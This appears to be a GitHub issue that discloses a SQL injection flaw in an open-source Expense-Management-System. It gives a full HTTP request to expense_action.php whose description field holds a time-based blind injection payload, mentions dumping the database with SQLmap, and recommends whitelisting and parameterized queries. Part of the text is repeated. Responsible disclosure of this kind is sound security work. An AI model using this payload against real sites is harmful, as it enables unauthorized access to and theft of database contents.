You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Above query will only sleep database for 20 second but Using SQLmap bad user can dump the database as show in image.
Control -
User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended.
Remediation -
To prevent this follow the following steps:
a) Validate all input data against a whitelist
b) Use of parameterized queries
String selectStatement = "SELECT * FROM User WHERE userId = ? ";
PreparedStatement prepStmt = con.prepareStatement(selectStatement);
prepStmt.setString(1, userId);
ResultSet rs = prepStmt.executeQuery();
The text was updated successfully, but these errors were encountered:
Hi
I found a SQL injection vulnerability in your Expense-Management-System
POST //Expense-Management-System-master/expense_action.php HTTP/1.1Host: 192.168.1.6User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 113Origin: http://192.168.1.6Connection: closeReferer: http://192.168.1.6//Expense-Management-System-master/Cookie: PHPSESSID=8jp0c36flam1krptku4bq9hvf5description=seafood'%2b(select*from(select(sleep(20)))a)%2b'&amount=3.21&date=2019-08-02&expense_id=2&action=EditAbove query will only sleep database for 20 second but Using SQLmap bad user can dump the database as show in image.
Control -
User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended.
Remediation -
To prevent this follow the following steps:
a) Validate all input data against a whitelist
b) Use of parameterized queries
String selectStatement = "SELECT * FROM User WHERE userId = ? ";
PreparedStatement prepStmt = con.prepareStatement(selectStatement);
prepStmt.setString(1, userId);
ResultSet rs = prepStmt.executeQuery();
The text was updated successfully, but these errors were encountered: